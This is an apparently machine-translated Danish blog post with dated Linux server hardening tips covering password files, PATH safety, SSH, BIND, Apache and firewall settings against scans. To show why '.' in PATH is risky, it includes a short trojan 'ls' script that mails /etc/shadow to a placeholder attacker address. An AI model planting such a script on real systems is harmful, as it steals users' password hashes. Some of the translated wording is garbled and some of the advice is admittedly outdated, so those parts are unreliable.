Jeg har ikke offentliggjort noget på bloggen i lang tid, og jeg vil gerne dele nogle råd, der er hentet fra en bog, som (blandt andre). Jeg fandt det på universitetet, og jeg læste lige, og selvom det ærligt talt er en smule forældet, og de viste teknikker meget usandsynligt vil fungere i betragtning af systemets udvikling, er de også interessante aspekter, der kan vises.
Jeg vil præcisere, at de er rådgivningsorienterede til et Linux-system, der bruges som en server, i mellemstor eller måske stor skala, da de på skrivebordets brugerniveau, selvom de kan anvendes, ikke ville være meget nyttige.
Jeg bemærker også, at de er enkle hurtige tip, og jeg vil ikke gå i detaljer, selvom jeg planlægger at lave et andet meget mere specifikt og omfattende indlæg om et bestemt emne. Men det får jeg se senere. Lad os komme igang.
Adgangskodepolitikker.
Selvom det lyder som en slagord, betyder det at have en god adgangskodepolitik forskellen mellem et sårbart system eller ej. Angreb som "brute force" drager fordel af at have en dårlig adgangskode for at få adgang til et system. De mest almindelige tip er:
- Kombiner store og små bogstaver.
- Brug specialtegn.
- Tal.
- Mere end 6 cifre (forhåbentlig mere end 8).
Ud over dette, lad os overveje to vigtige filer. / etc / passwd og / etc / shadow.
Noget meget vigtigt er, at filen / etc / passwd. Ud over at give os navnet på brugeren, hans uid, mappesti, bash .. osv. i nogle tilfælde viser det også brugerens krypterede nøgle.
Lad os se på dens typiske sammensætning.
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
bruger: kryptnøgle: uid: gid: sti :: sti: bash
Det virkelige problem her er, at denne fil har tilladelser -rw-r - r– hvilket betyder, at den har læsetilladelser for enhver bruger på systemet. og at have den krypterede nøgle er ikke særlig svært at dechifrere den rigtige.
Derfor findes filen / etc / shadow. Dette er den fil, hvor alle brugertasterne blandt andet er gemt. Denne fil har de nødvendige tilladelser, så ingen brugere kan læse den.
For at løse dette, skal vi gå til filen / Etc / passwd og ændre den krypterede nøgle til en "x", dette vil medføre, at nøglen kun gemmes i vores fil / etc / shadow.
desdelinux:x:500:501::/home/usuario1:/bin/bash
Problemer med PATH og .bashrc og andre.
Når en bruger udfører en kommando på deres konsol, ser shell efter den kommando i en katalogliste indeholdt i PATH-miljøvariablen.
Hvis du skriver "echo $ PATH" i konsollen, udsender den noget som dette.
.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin
Hver af disse mapper er hvor skallen vil se efter den kommando, der er skrevet til at udføre den. Han "." det betyder, at den første mappe, der skal søges, er den samme mappe, hvorfra kommandoen udføres.
Antag, at der er en bruger "Carlos", og denne bruger vil "gøre ondt." Denne bruger kunne efterlade en fil kaldet "ls" i sin hovedmappe, og i denne fil udføre en kommando som:
#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls
Og hvis rodbrugeren til tingene fra destinationen forsøger at liste mapperne inde i carlos-mappen (da den først ser efter kommandoen i den samme mappe, vil den utilsigtet sende filen med adgangskoderne til denne e-mail, og derefter vil mapperne blive vist og han ville ikke finde ud af det før meget sent.
For at undgå det skal vi fjerne "." af PATH-variablen.
På samme måde skal filer såsom /.bashrc, /.bashrc_profile, ./.login revideres og kontrollere, at der ikke er noget "." i PATH-variablen og faktisk fra filer som denne kan du ændre destinationen for en bestemt kommando.
Tips med tjenester:
SHH
- Deaktiver version 1 af ssh-protokollen i sshd_config-filen.
- Tillad ikke rodbrugeren at logge ind med ssh.
- Filerne og mapperne ssh_host_key, ssh_host_dsa_key og ssh_host_rsa_key skal kun læses af rodbrugeren.
BINDE
- Skift velkomstmeddelelsen i den named.conf-fil, så den ikke viser versionsnummeret
- Begræns overførsel af zone, og aktiver det kun for hold, der har brug for det.
Apache
- Undgå, at tjenesten viser din version i velkomstmeddelelsen. Rediger httpd.conf-filen, og tilføj eller rediger linjerne:
ServerSignature Off
ServerTokens Prod
- Deaktiver automatisk indeksering
- Konfigurer apache til ikke at servere følsomme filer som .htacces, * .inc, * .jsp .. osv
- Fjern mandsider eller prøve fra service
- Kør apache i et rodet miljø
Netværkssikkerhed.
Det er vigtigt at dække alle mulige poster til dit system fra det eksterne netværk. Her er nogle vigtige tip, der forhindrer ubudne gæster i at scanne og få information fra dit netværk.
Bloker ICMP-trafik
Firewall skal konfigureres til at blokere alle typer indgående og udgående ICMP-trafik og ekko-svar. Med dette undgår du, at f.eks. En scanner, der leder efter liveudstyr inden for et IP-område, finder dig.
Undgå TCP-ping-scanning.
En måde at scanne dit system på er TCP-ping-scanning. Antag, at der på din server er en Apache-server i port 80. Indtrængeren kan sende en ACK-anmodning til den port, med dette, hvis systemet reagerer, vil computeren være i live og scanne resten af portene.
Til dette skal din firewall altid have muligheden "tilstandsbevidsthed" og skal kassere alle ACK-pakker, der ikke svarer til en allerede etableret TCP-forbindelse eller -session.
Nogle yderligere tip:
- Brug IDS-systemer til at registrere port scanninger til dit netværk.
- Konfigurer Firewall, så den ikke stoler på forbindelseskildens portindstillinger.
Dette skyldes, at nogle scanninger bruger en "falsk" kildeport såsom 20 eller 53, da mange systemer stoler på disse porte, fordi de er typiske for en ftp eller en DNS.
BEMÆRK: Husk, at de fleste af de problemer, der er angivet i dette indlæg, allerede er løst i næsten alle aktuelle distributioner. Men det gør aldrig ondt at have vigtige oplysninger om disse problemer, så de ikke sker for dig.
BEMÆRK: Senere vil jeg se et bestemt emne, og jeg vil lave et indlæg med meget mere detaljerede og aktuelle oplysninger.
Thaks alle til læsning.
Greetings.
Jeg kunne virkelig godt lide artiklen, og jeg er interesseret i emnet, jeg opfordrer dig til at fortsætte med at uploade indhold.